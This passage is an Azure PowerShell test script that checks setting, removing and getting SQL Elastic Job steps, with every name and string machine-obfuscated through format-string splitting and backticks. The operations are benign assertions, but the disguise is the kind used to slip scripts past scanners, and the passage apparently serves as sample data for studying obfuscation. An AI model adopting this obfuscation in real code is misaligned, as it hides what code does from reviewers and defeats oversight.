	${r`ESP} = &("{2}{4}{5}{1}{3}{0}"-f 'JobStep','last','S','ic','et-Az','SqlE') -InputObject ${J`S1} -OutputTableName ${TABL`en`AmE2}
	&("{4}{1}{0}{3}{2}" -f'Ar','ssert-','l','eEqua','A') ${r`eSP}."OUT`p`UT"."tA`BlE`NAmE" ${tABLen`Am`E2}

	
	${RE`sp} = &("{3}{0}{5}{4}{1}{2}{6}" -f'Sq','icJ','obS','Set-Az','Elast','l','tep') -InputObject ${j`s1} -OutputCredentialName ${j`c2}."CREd`e`NtIaln`AME"
	&("{2}{1}{0}{3}" -f'q','reE','Assert-A','ual') ${R`ESP}."o`UtpUT"."c`R`EdEnTIal" ${j`c2}."cR`EDEN`Tia`LnAMe"

	
	${r`esP} = &("{4}{3}{2}{0}{1}"-f 'obS','tep','cJ','asti','Set-AzSqlEl') -InputObject ${J`s1} -RemoveOutput
	&("{2}{0}{1}"-f 'ert-','Null','Ass') ${R`eSp}."O`U`TPUT"

	
	${r`eSp} = &("{1}{4}{0}{3}{6}{5}{2}"-f'z','S','obStep','SqlEl','et-A','J','astic') -InputObject ${J`S1} -TimeoutSeconds 100
	&("{1}{2}{4}{0}{3}" -f 'reE','Ass','ert-','qual','A') ${r`ESp}."t`imE`ouT`secOn`Ds" 100

	
	${r`esp} = &("{4}{3}{5}{1}{0}{2}"-f'i','ast','cJobStep','AzS','Set-','qlEl') -InputObject ${J`s1} -RetryAttempts 1000
	&("{1}{3}{2}{0}"-f'l','Assert-A','qua','reE') ${RE`Sp}."R`e`TrY`AtTE`mptS" 1000

	
	${R`esP} = &("{6}{4}{5}{0}{1}{3}{2}"-f'ti','c','tep','JobS','Sql','Elas','Set-Az') -InputObject ${j`S1} -InitialRetryIntervalSeconds 100
	&("{4}{3}{0}{1}{2}"-f't-Are','Equ','al','sser','A') ${r`EsP}."inI`TIA`LrEtRyINtErvAL`S`eC`On`Ds" 100

	
	${Re`sP} = &("{0}{4}{2}{1}{5}{3}" -f'Se','lEl','AzSq','sticJobStep','t-','a') -InputObject ${j`s1} -MaximumRetryIntervalSeconds 1000
	&("{0}{4}{2}{1}{3}"-f 'A','Equ','re','al','ssert-A') ${r`Esp}."M`A`XiM`UMrETR`yINTeR`VaLsEcONDs" 1000

	
	${r`ESP} = &("{2}{4}{1}{0}{3}" -f'obSt','asticJ','Set-','ep','AzSqlEl') -InputObject ${j`S1} -RetryIntervalBackoffMultiplier 5.2
	&("{1}{0}{2}{3}{4}" -f'sert-A','As','reEq','ua','l') ${Re`Sp}."Ret`RyINte`RvA`L`BackoffmUlti`pLI`ER" 5.2
}


function t`EsT`-UpdaTEjOBsT`ePWI`ThReso`UR`ceiD (${A`1})
{
	
	${J`c1} = &("{3}{1}{2}{5}{4}{0}{6}" -f 'r','-Jo','bC','Create','edentialFo','r','Test') ${a`1}
	${J`c2} = &("{7}{3}{0}{4}{6}{2}{5}{1}" -f'e-Job','st','For','t','Creden','Te','tial','Crea') ${A`1}
	${T`g1} = &("{6}{3}{7}{1}{2}{0}{5}{4}" -f 'F','rg','etGroup','r','rTest','o','C','eate-Ta') ${a1}
	${t`g2} = &("{0}{5}{6}{3}{1}{2}{4}" -f 'C','etGroup','For','Targ','Test','r','eate-') ${a1}
	${j1} = &("{1}{0}{4}{2}{3}"-f'ate','Cre','JobForTes','t','-') ${A1}
	${C`T1} = ("{1}{0}{2}" -f'T ','SELEC','1')
	${C`T2} = ("{0}{2}{1}"-f'SELEC',' 2','T')
	${J`S1} = &("{1}{2}{0}{3}{4}{5}"-f'b','Create','-Jo','Ste','pForTe','st') ${j1} ${T`g1} ${j`C1} ${c`T1}
	${d`B1} = ${A`1} | &("{2}{0}{3}{4}{1}"-f '-Az','ase','Get','ureRmSqlDat','ab')
	${S`cHE`maNaMe} = ("{0}{1}" -f'sche','ma1')
	${sc`HEm`ANaMe2} = ("{1}{0}"-f 'a2','schem')
	${TABL`e`NAME} = ("{1}{0}"-f'e1','tabl')
	${tab`l`ENAM`e2} = ("{1}{0}" -f 'ble2','ta')

	
	${R`eSP} = &("{0}{4}{3}{1}{2}{5}"-f'Set-Az','asti','cJobSt','lEl','Sq','ep') -ResourceId ${J`s1}."Re`sOuRc`EiD" -TargetGroupName ${t`g2}."T`A`R`getGrO`UPNAMe"
	&("{0}{2}{1}" -f'A','rt-AreEqual','sse') ${Re`Sp}."TarGe`TGr`O`U`pNAme" ${t`g2}."Tar`gET`G`R`ouPnAME"

	
	${re`sP} = &("{4}{5}{6}{2}{3}{0}{1}"-f'Ste','p','la','sticJob','Set-Az','Sql','E') -ResourceId ${J`S1}."r`e`soURCe`iD" -CredentialName ${j`c2}."Cred`en`Tial`NaME"
	&("{1}{2}{0}{4}{3}" -f 't-A','As','ser','al','reEqu') ${RE`sP}."CRedEnt`i`A`LN`AMe" ${j`C2}."cRE`DEN`T`iALN`Ame"

	
	${re`SP} = &("{6}{4}{3}{2}{5}{1}{0}" -f 'Step','b','ticJ','las','E','o','Set-AzSql') -ResourceId ${j`s1}."Re`sOU`RCE`ID" -CommandText ${C`T2}
	&("{3}{1}{2}{0}"-f 'AreEqual','rt','-','Asse') ${RE`Sp}."ComM`An`DtEXT" ${C`T2}

	
	${rE`sP} = &("{4}{3}{5}{1}{2}{0}"-f 'bStep','qlElas','ticJo','Az','Set-','S') -ResourceId ${j`S1}."R`esOU`RCEiD" -OutputDatabaseObject ${D`B1} -OutputSchemaName ${S`cHemA`NA`me} -OutputTableName ${TaBL`en`AME} -OutputCredentialName ${J`c1}."cRE`dentI`AlN`Ame"
	&("{3}{0}{1}{2}"-f'sert-AreEq','u','al','As') ${R`esP}."ouTp`Ut"."ReSO`URCegr`OuPN`A`mE" ${d`B1}."resoURcE`gr`ou`pname"
	&("{2}{1}{3}{0}{4}"-f'E','ert-','Ass','Are','qual') ${re`SP}."Out`pUT"."seRV`E`RNAMe" ${d`B1}."serve`Rn`AMe"
	&("{3}{1}{0}{2}"-f't-AreE','ser','qual','As') ${r`Esp}."OU`TPUt"."dA`TabASE`Na`Me" ${d`B1}."dA`TaB`AsEnaMe"
	&("{2}{3}{0}{1}"-f'qua','l','Assert-Ar','eE') ${RE`sp}."o`U`TPut"."Sch`e`mANaME" ${s`CHE`m`AnAMe}
	&("{1}{2}{0}"-f 't-AreEqual','A','sser') ${R`Esp}."OutP`UT"."tAble`NA`Me" ${T`Able`NAMe}
	&("{3}{2}{0}{1}" -f'eEq','ual','ssert-Ar','A') ${RE`SP}."OU`TpuT"."Cr`edEnTi`Al" ${J`C1}."CrEd`EnTiaLNA`Me"

	
	${RE`sP} = &("{0}{3}{5}{4}{2}{1}" -f'Set-AzS','bStep','Jo','qlElas','c','ti') -ResourceId ${J`S1}."r`eSO`UrCeid" -OutputDatabaseResourceId ${d`B1}."r`ESO`UrcEID"
	&("{3}{1}{0}{2}" -f'A','rt-','reEqual','Asse') ${R`esP}."o`U`TPUT"."re`s`o`UrCeGR`OupNaME" ${d`B1}."res`oUrce`gROu`PnaMe"
	&("{0}{3}{4}{1}{2}" -f 'Asser','u','al','t-Are','Eq') ${R`ESP}."out`pUt"."SeR`V`erN`AmE" ${d`B1}."S`ErvER`N`Ame"
	&("{1}{2}{0}" -f'al','Assert-Ar','eEqu') ${rE`SP}."O`UtPUt"."dATaB`A`Sen`AMe" ${d`B1}."d`AtABas`ENa`ME"
	&("{0}{4}{2}{1}{3}"-f 'Ass','-AreEqu','rt','al','e') ${Re`Sp}."OuTP`Ut"."SCHeMA`N`Ame" ${s`ch`e`maNAme}
	&("{2}{3}{0}{1}" -f'q','ual','Assert-A','reE') ${R`Esp}."OU`TpUt"."TAble`N`AMe" ${Ta`Bl`enAMe}
	&("{2}{1}{0}{3}"-f 'e','Ar','Assert-','Equal') ${re`sP}."OUt`p`Ut"."CrEDEN`T`iAL" ${j`c1}."CreDENT`I`AL`NAme"

	
	${R`eSP} = &("{0}{6}{3}{2}{5}{4}{1}"-f'Set-Az','bStep','l','E','icJo','ast','Sql') -ResourceId ${J`S1}."ReSOURC`e`id" -OutputSchemaName ${sChE`m`ANAm`E2}
	&("{3}{2}{1}{0}{4}"-f'E','re','t-A','Asser','qual') ${r`EsP}."OUt`puT"."SC`hEm`A`Name" ${sCh`EmaN`Am`E2}

	
	${r`eSp} = &("{1}{2}{3}{0}" -f 'ep','Set','-AzSqlElasticJob','St') -ResourceId ${j`S1}."rESo`URCe`Id" -OutputTableName ${TA`BlE`NAMe2}
	&("{3}{1}{0}{2}"-f't-AreEqua','sser','l','A') ${r`EsP}."O`U`TpUT"."TaBLE`NaME" ${TAB`l`EnAm`e2}

	
	${R`eSP} = &("{0}{3}{2}{4}{1}" -f'Set-A','icJobStep','S','z','qlElast') -ResourceId ${J`s1}."rEsOurc`e`iD" -OutputCredentialName ${J`c2}."cRe`de`NTiaLn`AME"
	&("{4}{1}{0}{2}{3}"-f'r','se','t-AreE','qual','As') ${R`esP}."Out`p`Ut"."CReD`e`Nt`IAL" ${j`C2}."Cr`EdENti`ALNAmE"

	
	${r`ESP} = &("{4}{2}{3}{5}{1}{0}{6}"-f 'a','El','S','q','Set-Az','l','sticJobStep') -ResourceId ${j`s1}."rEs`ouRc`eiD" -RemoveOutput
	&("{0}{2}{1}"-f 'Ass','ull','ert-N') ${r`eSP}."ou`TPUT"

	
	${re`sp} = &("{6}{1}{3}{4}{0}{5}{2}"-f 'o','et-AzSql','Step','Elasti','cJ','b','S') -ResourceId ${j`s1}."reSOu`RC`EiD" -TimeoutSeconds 100
	&("{1}{0}{2}{3}"-f 'e','Assert-Ar','Eq','ual') ${r`esp}."tIMEou`T`sEC`On`ds" 100

	
	${rE`sP} = &("{4}{0}{3}{1}{2}"-f 'e','zS','qlElasticJobStep','t-A','S') -ResourceId ${J`s1}."R`eS`Ou`RCEID" -RetryAttempts 1000
	&("{4}{0}{2}{1}{3}" -f'ss','t-AreEq','er','ual','A') ${Re`Sp}."rEt`R`YaTt`E`MPTs" 1000

	
	${Re`sP} = &("{5}{3}{1}{0}{2}{4}"-f 'ElasticJo','l','bS','AzSq','tep','Set-') -ResourceId ${J`S1}."r`ESOurC`eID" -InitialRetryIntervalSeconds 100
	&("{0}{1}{3}{4}{2}" -f 'As','ser','al','t-AreE','qu') ${Re`sP}."InI`T`IA`lRe`TryIntERv`Al`SeCoNds" 100

	
	${r`EsP} = &("{3}{0}{4}{2}{1}{5}"-f't','o','lasticJ','Se','-AzSqlE','bStep') -ResourceId ${j`s1}."resOUR`C`EID" -MaximumRetryIntervalSeconds 1000
	&("{3}{2}{0}{1}"-f'r','t-AreEqual','se','As') ${R`EsP}."MaXiMUmRetr`YI`NtER`Va`LseCoNDS" 1000

	
	${r`EsP} = &("{0}{4}{1}{5}{2}{3}" -f 'Set-Az','qlE','a','sticJobStep','S','l') -ResourceId ${J`s1}."REsouRc`e`id" -RetryIntervalBackoffMultiplier 5.2
	&("{1}{0}{2}{3}"-f'rt-AreEq','Asse','ua','l') ${R`EsP}."ReTryiNT`erVA`LBAC`k`OfFmUlTIpL`iER" 5.2
}


function TEST-UP`DatE`JObSTePwI`ThPip`iNG (${a`1})
{
	
	${j`c1} = &("{2}{0}{1}{4}{3}"-f '-JobCredentialF','or','Create','st','Te') ${A1}
	${j`c2} = &("{6}{1}{0}{2}{3}{4}{5}" -f 'edenti','JobCr','a','l','F','orTest','Create-') ${A`1}
	${T`g1} = &("{4}{3}{2}{5}{0}{1}" -f 'rT','est','g','ar','Create-T','etGroupFo') ${a`1}
	${T`g2} = &("{5}{4}{1}{3}{0}{2}"-f 'u','arget','pForTest','Gro','T','Create-') ${a`1}
	${j`1} = &("{3}{0}{2}{1}" -f'eate','t','-JobForTes','Cr') ${A`1}
	${C`T1} = ("{0}{1}{2}" -f 'S','E','LECT 1')
	${c`T2} = ("{0}{1}"-f'SEL','ECT 2')
	${j`S1} = &("{3}{2}{0}{1}"-f 'Te','st','or','Create-JobStepF') ${J`1} ${T`g1} ${J`c1} ${C`T1}
	${D`B1} = ${A1} | &("{0}{4}{1}{2}{3}{5}"-f'Get-','ureR','mSqlDa','t','Az','abase')
	${Sch`emAnA`mE} = ("{1}{0}"-f'ma1','sche')
	${sch`Em`ANAme2} = ("{0}{1}"-f 'sch','ema2')
	${Tab`le`N`AmE} = ("{1}{0}"-f'able1','t')
	${T`ABLEN`A`ME2} = ("{0}{1}"-f 't','able2')

	
	${r`eSP} = ${J`s1} | &("{3}{2}{4}{0}{1}" -f 'Job','Step','t-AzSqlEl','Se','astic') -TargetGroupName ${T`G2}."taRG`eTGrO`U`PNAmE"
	&("{2}{3}{0}{1}{4}" -f 'er','t-','As','s','AreEqual') ${r`eSp}."ta`RgE`TgrOUPn`AME" ${T`g2}."TaR`gEtgr`OuPNA`ME"

	
	${Re`sp} = ${j`s1} | &("{2}{3}{4}{5}{1}{0}"-f 'ep','obSt','Set-Az','S','qlElas','ticJ') -CredentialName ${j`c2}."Cr`edEnt`IA`LnamE"
	&("{0}{3}{2}{1}" -f'Assert-','qual','eE','Ar') ${Re`sp}."cRE`DE`NtIA`l`NAme" ${J`C2}."CR`E`dE`NTIALnA`Me"

	
	${r`Esp} = ${J`S1} | &("{2}{5}{0}{4}{1}{3}" -f'qlEl','c','Set-','JobStep','asti','AzS') -CommandText ${C`T2}
	&("{1}{2}{0}{3}" -f '-Ar','As','sert','eEqual') ${r`eSP}."coMma`NdT`e`Xt" ${C`T2}

	
	${Re`sp} = ${J`S1} | &("{2}{6}{3}{1}{5}{0}{4}" -f 'obSt','stic','Set-','lEla','ep','J','AzSq') -OutputDatabaseObject ${D`B1} -OutputSchemaName ${SC`hemANa`me} -OutputTableName ${TAB`lE`NAme} -OutputCredentialName ${J`C1}."crEdEnTi`AlN`AME"
	&("{2}{3}{0}{1}"-f 'reEq','ual','Asse','rt-A') ${R`ESp}."ou`TPuT"."Re`sOURc`eg`ROup`Name" ${D`B1}."RESourceGR`O`Up`N`Ame"
	&("{1}{3}{2}{0}" -f'qual','Assert','E','-Are') ${R`eSp}."O`Ut`PUt"."SErVErN`A`mE" ${D`B1}."S`ervErn`AmE"
	&("{0}{1}{3}{2}"-f'Asse','rt','eEqual','-Ar') ${Re`Sp}."ou`TPUt"."dAt`A`BaS`ENAME" ${d`B1}."Data`Ba`senAME"
	&("{1}{4}{3}{2}{0}" -f'ual','A','Eq','rt-Are','sse') ${rE`SP}."Ou`Tput"."SC`hemanA`me" ${Sc`He`manAMe}
	&("{1}{4}{3}{0}{2}"-f'reEqua','Asse','l','-A','rt') ${Re`sp}."O`UtP`UT"."T`AbLE`NamE" ${tABl`Ena`mE}
	&("{3}{1}{0}{2}" -f 'rt-AreE','sse','qual','A') ${r`esP}."ou`T`pUT"."Cr`Ed`enTI`AL" ${j`c1}."c`ReD`eNTi`ALNAME"

	
	${r`eSP} = ${j`S1} | &("{0}{1}{3}{2}"-f'Set-AzSql','ElasticJobS','ep','t') -OutputDatabaseResourceId ${d`B1}."r`e`sou`Rceid"
	&("{0}{2}{1}"-f'Ass','AreEqual','ert-') ${Re`sp}."OU`T`put"."R`eSo`UrCeG`Ro`U`pName" ${d`B1}."rES`Ou`R`c`Eg`ROUpnaMe"
	&("{1}{4}{2}{3}{0}"-f 'l','Asser','-AreE','qua','t') ${rE`SP}."OuTp`UT"."SeR`Ve`RnAME" ${D`B1}."Ser`VE`Rn`AMe"
	&("{4}{2}{1}{3}{0}"-f 'al','rt-Ar','sse','eEqu','A') ${r`eSp}."O`U`TpuT"."Dat`A`BA`SenamE" ${d`B1}."D`AtaBAS`en`AmE"
	&("{1}{4}{3}{0}{2}" -f 't-AreEqua','A','l','r','sse') ${rE`sP}."OuTp`Ut"."ScHEMaN`A`ME" ${S`chEm`ANAMe}
	&("{3}{1}{0}{2}{4}"-f 'Equ','rt-Are','a','Asse','l') ${rE`SP}."Ou`T`Put"."tA`BlENAME" ${taB`Len`Ame}
	&("{3}{2}{0}{1}{4}" -f 'r','eE','t-A','Asser','qual') ${re`sp}."O`Ut`PUT"."cr`Eden`Tial" ${j`c1}."Cr`eDen`TiA`LNAME"

	
	${rE`SP} = ${j`S1} | &("{2}{0}{4}{1}{5}{3}" -f't-AzS','obSt','Se','p','qlElasticJ','e') -OutputSchemaName ${S`CH`EmAna`mE2}
	&("{4}{0}{2}{1}{3}" -f 't','E','-Are','qual','Asser') ${r`ESP}."Ou`TPut"."S`CHEmA`NaMe" ${SC`H`EMANA`me2}

	
	${re`Sp} = ${j`s1} | &("{0}{2}{1}{4}{5}{3}" -f'Set-AzSq','s','lEla','bStep','ticJ','o') -OutputTableName ${t`ABL`ENaMe2}
	&("{0}{2}{3}{1}" -f'Assert-','l','Ar','eEqua') ${re`sp}."o`UTPuT"."TAbL`enA`mE" ${Ta`B`LE`NaME2}

	
	${R`esp} = ${J`S1} | &("{5}{2}{1}{0}{4}{3}{6}" -f'ast','l','-AzSqlE','c','i','Set','JobStep') -OutputCredentialName ${J`C2}."c`RE`d`ENTiaLNamE"
	&("{1}{2}{0}" -f'AreEqual','Assert','-') ${R`EsP}."o`UTPuT"."Cr`Ede`NTiaL" ${j`c2}."CRe`DEN`Tia`L`NaMe"

	
	${RE`sP} = ${j`s1} | &("{1}{0}{3}{4}{5}{2}"-f'et-Az','S','ep','Sql','El','asticJobSt') -RemoveOutput
	&("{1}{2}{0}"-f'ull','Asser','t-N') ${RE`SP}."Ou`T`PUt"

	
	${re`SP} = ${j`s1} | &("{3}{4}{2}{0}{1}" -f 'JobS','tep','lastic','Set-AzS','qlE') -TimeoutSeconds 100
	&("{1}{3}{2}{0}"-f 'Equal','As','Are','sert-') ${RE`SP}."TimE`OuT`SecondS" 100

	
	${re`Sp} = ${j`S1} | &("{2}{1}{4}{3}{0}" -f'JobStep','-AzSqlElast','Set','c','i') -RetryAttempts 1000
	&("{3}{1}{2}{0}{4}" -f'ua','sert','-AreEq','As','l') ${R`eSp}."rETRYAT`TE`m`pts" 1000

	
	${RE`sp} = ${j`S1} | &("{5}{3}{2}{1}{0}{4}"-f 'bS','ElasticJo','AzSql','t-','tep','Se') -InitialRetryIntervalSeconds 100
	&("{4}{3}{0}{2}{1}"-f'-AreEq','al','u','sert','As') ${r`EsP}."inI`TIAlrEt`Ryi`N`T`eR`VaLSEC`oN`DS" 100

	
	${R`eSp} = ${J`S1} | &("{1}{0}{4}{2}{3}"-f 'et','S','SqlEl','asticJobStep','-Az') -MaximumRetryIntervalSeconds 1000
	&("{1}{4}{3}{2}{0}" -f'eEqual','As','r','rt-A','se') ${Re`sP}."ma`xIm`Um`REtryiNTER`VaLsecoNDS" 1000

	
	${r`ESp} = ${J`s1} | &("{0}{2}{4}{1}{5}{3}" -f'Set-A','l','zS','Step','q','ElasticJob') -RetryIntervalBackoffMultiplier 5.2
	&("{0}{1}{2}{3}" -f 'Asser','t','-A','reEqual') ${rE`SP}."reTRyiNt`E`RvaLBa`CkoFf`mult`ip`L`I`ER" 5.2
}


function TEST`-REmOvejObStEpW`I`T`hDeFA`UlTPA`R`AM (${A`1})
{
	
	${j`c1} = &("{2}{3}{6}{0}{4}{5}{1}{7}"-f 'Crede','Te','Create-','Jo','ntialFo','r','b','st') ${A1}
	${t`g1} = &("{5}{4}{6}{1}{3}{2}{0}" -f 't','GroupF','Tes','or','rea','C','te-Target') ${A`1}
	${j1} = &("{0}{3}{1}{4}{2}"-f'Cre','JobFo','est','ate-','rT') ${A`1}
	${C`T1} = ("{0}{1}{2}" -f 'S','EL','ECT 1')
	${j`S1} = &("{3}{1}{0}{4}{2}" -f 'tep','bS','st','Create-Jo','ForTe') ${j1} ${T`G1} ${j`C1} ${c`T1}

	
	${RE`sp} = &("{3}{0}{2}{5}{4}{1}"-f'ove','Step','-AzSql','Rem','icJob','Elast') -ResourceGroupName ${j`S1}."rEsO`UrcE`GRO`Upn`AME" -ServerName ${J`S1}."s`ErVeRN`A`ME" -AgentName ${J`s1}."ag`eNt`NAMe" -JobName ${J`S1}."JoB`NAmE" -Name ${J`S1}."s`TEPNA`Me"
	&("{0}{2}{1}{3}" -f 'As','t-Are','ser','Equal') ${RE`Sp}."reSOur`c`eGRoUp`NAME" ${j`S1}."R`eSoURc`e`Gr`OupNAMe"
	&("{0}{1}{2}{3}" -f 'Asse','rt-Ar','e','Equal') ${re`sP}."s`ERvernA`me" ${j`S1}."s`ERvernA`Me"
	&("{1}{3}{0}{2}"-f'ser','A','t-AreEqual','s') ${R`esp}."AGe`N`TName" ${j`s1}."a`gENt`NaME"
	&("{1}{4}{0}{2}{3}"-f'rt-A','A','reEqu','al','sse') ${R`esP}."jo`Bn`AmE" ${j`S1}."J`O`BName"
	&("{3}{0}{1}{2}"-f'rt-Are','Equa','l','Asse') ${RE`Sp}."sTE`pName" ${J`s1}."sT`epNA`mE"
	&("{0}{1}{2}"-f 'Asse','rt-AreEq','ual') ${RE`Sp}."tARGET`GRo`UPNa`mE" ${j`s1}."tarGeTg`ROUp`N`AmE"
	&("{2}{1}{3}{0}"-f'al','r','Assert-A','eEqu') ${Re`SP}."cr`eD`eNt`iALNamE" ${j`s1}."c`RE`dENt`IAlnAME"
}


function t`eSt`-rEmOvejObS`TeP`wit`h`i`NPutobjECt (${a`1})
{
	
	${j`C1} = &("{7}{5}{6}{0}{3}{1}{4}{8}{2}"-f 'nt','a','st','i','lF','a','te-JobCrede','Cre','orTe') ${a1}
	${t`G1} = &("{1}{0}{2}{3}{4}" -f'te-TargetGroupF','Crea','o','rTe','st') ${a`1}
	${j`1} = &("{3}{0}{1}{4}{2}"-f'ate-','JobFo','est','Cre','rT') ${a1}
	${C`T1} = ("{0}{1}{2}"-f'SE','LE','CT 1')
	${j`s1} = &("{3}{4}{5}{2}{6}{1}{0}"-f 't','s','ep','Cre','ate-','JobSt','ForTe') ${J1} ${T`G1} ${J`C1} ${C`T1}

	
	${rE`SP} = &("{3}{4}{1}{2}{0}{6}{5}" -f'l','AzS','q','Remove','-','ticJobStep','Elas') -InputObject ${j`S1}
	&("{1}{0}{2}{3}"-f'r','Asse','t-Are','Equal') ${r`ESp}."re`so`UrC`EgRoUpnaMe" ${j`s1}."R`e`s`oUrc`EgROu`Pname"
	&("{3}{1}{2}{0}" -f'eEqual','t','-Ar','Asser') ${r`ESP}."Ser`VErn`AmE" ${J`S1}."S`ERv`ERNamE"
	&("{2}{0}{3}{1}" -f 'e','al','Assert-Ar','Equ') ${RE`SP}."Ag`enTna`Me" ${j`s1}."aGE`N`Tn`AmE"
	&("{2}{3}{0}{4}{1}"-f'Ar','qual','Assert','-','eE') ${r`esp}."jO`B`NAME" ${J`S1}."j`Obna`me"
	&("{4}{3}{1}{0}{2}" -f 'u','eEq','al','ssert-Ar','A') ${rE`sp}."st`E`PNAME" ${j`S1}."s`TE`pNAME"
	&("{3}{1}{2}{0}{4}" -f'reEqu','ssert-','A','A','al') ${r`eSP}."tA`RgETGRoupna`mE" ${j`s1}."T`ArGeTGR`OupN`AMe"
	&("{2}{1}{4}{3}{0}" -f 'ual','sse','A','t-AreEq','r') ${RE`sP}."crEDENtI`A`lnA`me" ${J`S1}."CReDe`NTIALna`Me"
}


function TES`T-R`E`Mo`V`ejoBstePwiTh`RE`soUrC`eID (${a1})
{
	
	${J`C1} = &("{3}{4}{1}{0}{5}{2}" -f'ialF','nt','t','Create-Job','Crede','orTes') ${a1}
	${t`G1} = &("{6}{0}{2}{4}{1}{3}{5}" -f'T','or','argetGr','Te','oupF','st','Create-') ${A1}
	${J1} = &("{3}{1}{0}{4}{2}" -f'For','b','st','Create-Jo','Te') ${A1}
	${C`T1} = ("{2}{0}{1}" -f ' ','1','SELECT')
	${J`S1} = &("{1}{0}{3}{2}" -f 'e-','Creat','pForTest','JobSte') ${J`1} ${T`g1} ${J`C1} ${C`T1}

	
	${Re`sP} = &("{1}{2}{4}{5}{3}{0}{6}"-f'cJ','Re','m','ti','ove-Az','SqlElas','obStep') -ResourceId ${j`s1}."RE`So`U`RceId"
	&("{1}{2}{3}{0}{4}"-f 'Equa','Ass','ert-Ar','e','l') ${r`eSP}."R`eS`ourcEgRo`U`pNA`Me" ${J`s1}."re`SouRcEgroU`P`Name"
	&("{1}{3}{2}{0}" -f 'l','As','eEqua','sert-Ar') ${r`esp}."sEr`VErNa`ME" ${J`S1}."SER`VERnA`me"
	&("{0}{2}{1}{3}"-f'Assert-','r','A','eEqual') ${rE`Sp}."A`G`EnTna`mE" ${J`S1}."a`g`EnTNaME"
	&("{2}{3}{1}{0}{4}"-f 'ua','q','Asser','t-AreE','l') ${Re`Sp}."jOb`NA`mE" ${j`S1}."jO`B`NaME"
	&("{3}{1}{2}{0}"-f 'al','Eq','u','Assert-Are') ${R`esp}."ste`P`NAME" ${j`s1}."st`Ep`NAMe"
	&("{1}{3}{0}{2}{4}"-f 'rt-Are','Ass','E','e','qual') ${RE`sp}."T`A`RgEt`gROUp`NAME" ${j`s1}."TAr`GeTgROu`pn`AmE"
	&("{2}{3}{1}{0}" -f'al','ert-AreEqu','As','s') ${re`sP}."CR`eDenTI`ALNAMe" ${J`S1}."Cred`e`NtI`AlNAmE"
}


function teST-rEmovejOBS`T`e`Pw`itHPipINg (${A1})
{
	
	${J`C1} = &("{2}{5}{0}{7}{1}{4}{8}{6}{3}" -f '-Jo','Cr','C','est','ede','reate','rT','b','ntialFo') ${a`1}
	${T`g1} = &("{1}{4}{3}{2}{0}{5}" -f 'rgetGroupForTes','Crea','a','T','te-','t') ${a1}
	${J`1} = &("{0}{3}{2}{1}"-f'Cr','obForTest','te-J','ea') ${A`1}
	${C`T1} = ("{2}{1}{0}" -f'1','CT ','SELE')

	
	${J`s1} = &("{0}{2}{3}{5}{4}{1}" -f'Crea','Test','t','e-','pFor','JobSte') ${j1} ${t`G1} ${J`c1} ${C`T1}
	${J`S2} = &("{1}{0}{3}{4}{2}"-f 'reate','C','tepForTest','-Jo','bS') ${j1} ${t`g1} ${J`c1} ${C`T1}

	
	${rE`sP} = ${J`S1} | &("{2}{5}{4}{1}{0}{3}" -f 'bSt','Jo','Re','ep','c','move-AzSqlElasti')
	&("{3}{0}{1}{2}" -f's','ert-AreE','qual','As') ${RE`sP}."R`eSourCEGrO`UPn`AME" ${j`S1}."re`sOU`RcegR`OuPNAMe"
	&("{0}{3}{4}{1}{2}"-f'A','eEqua','l','ss','ert-Ar') ${r`esp}."s`ER`VERNa`ME" ${j`s1}."se`RvERnA`Me"
	&("{0}{1}{4}{3}{2}"-f'A','s','reEqual','A','sert-') ${r`ESP}."AgENt`NA`ME" ${j`s1}."A`genT`NAmE"
	&("{2}{1}{0}"-f'ual','ert-AreEq','Ass') ${r`esP}."jo`BNAmE" ${j`S1}."j`OB`NAme"
	&("{3}{2}{1}{4}{0}"-f 'qual','-Ar','t','Asser','eE') ${r`esp}."s`TEP`NamE" ${J`S1}."S`TePN`AmE"
	&("{0}{1}{3}{2}"-f 'Asse','r','AreEqual','t-') ${rE`SP}."TArgetgro`UPn`Ame" ${j`s1}."TARg`E`TgRo`UpName"
	&("{2}{3}{0}{1}"-f'eE','qual','Assert-','Ar') ${R`eSp}."Cr`EDENti`AL`NA`me" ${j`s1}."cR`EDENti`A`lna`Me"

	
	${A`llSTepsF`or`jOB} = ${J1} | &("{4}{1}{3}{5}{0}{2}"-f'Job','-AzS','Step','q','Get','lElastic')
	${rE`sp} = ${Al`L`st`e`PSfoRjOb} | &("{0}{2}{4}{3}{1}"-f'Re','Step','move','lasticJob','-AzSqlE')
	&("{3}{1}{0}{2}" -f'reEq','ert-A','ual','Ass') ${R`esP}."Cou`NT" 1

	
	&("{1}{3}{4}{0}{2}"-f'-T','A','hrows','sser','t') { ${j1} | &("{4}{5}{0}{2}{1}{3}"-f'z','qlEl','S','asticJobStep','Ge','t-A') -Name ${j`s1}."st`E`pNaME" }
}


function TESt-`gETjO`BsTEp`wIT`H`def`AulTp`AraM (${A1})
{
	
	${j`c1} = &("{0}{1}{5}{2}{6}{3}{4}" -f 'Cr','eate-','obCr','entialForTe','st','J','ed') ${a1}
	${T`G1} = &("{2}{4}{1}{5}{0}{3}{6}"-f 'r','-Tar','Crea','oupF','te','getG','orTest') ${a1}
	${j`1} = &("{0}{2}{1}{3}"-f'Create-','bForTe','Jo','st') ${a1}
	${C`T1} = ("{2}{0}{1}"-f 'ELECT ','1','S')
	${J`s1} = &("{0}{5}{6}{2}{1}{3}{4}" -f'Create-','Fo','Step','r','Test','Jo','b') ${j`1} ${t`g1} ${J`c1} ${C`T1}
	&("{1}{4}{3}{0}{5}{2}"-f'b','Cre','pForTest','-Jo','ate','Ste') ${J1} ${T`G1} ${j`C1} ${c`T1}

	
	${r`esp} = &("{3}{6}{5}{2}{0}{4}{1}"-f'bS','p','cJo','Get','te','zSqlElasti','-A') -ResourceGroupName ${j`S1}."r`eSo`URcEgro`U`pname" -ServerName ${J`s1}."S`ErvE`RnAMe" -AgentName ${J`S1}."A`Gen`TName" -JobName ${J`S1}."JO`BNAmE" -Name ${j`s1}."Step`N`AMe"
	&("{3}{2}{0}{1}"-f'Equ','al','e','Assert-Ar') ${Re`sp}."Res`ourC`e`GRouPNA`me" ${J`S1}."ResOu`RcegR`oUp`NAmE"
	&("{3}{1}{2}{0}"-f 'qual','rt','-AreE','Asse') ${RE`SP}."S`E`RVeRnAME" ${J`s1}."seR`Ver`N`Ame"
	&("{2}{0}{1}{3}"-f'ss','er','A','t-AreEqual') ${r`ESp}."Ag`EnT`NAME" ${j`s1}."AGeN`TNAmE"
	&("{1}{0}{2}"-f't-Ar','Asser','eEqual') ${RE`SP}."Jo`BnAme" ${j`S1}."joB`NamE"
	&("{0}{1}{2}" -f'A','ssert-AreEq','ual') ${rE`sP}."sT`EPNAmE" ${j`s1}."sTEpN`A`me"
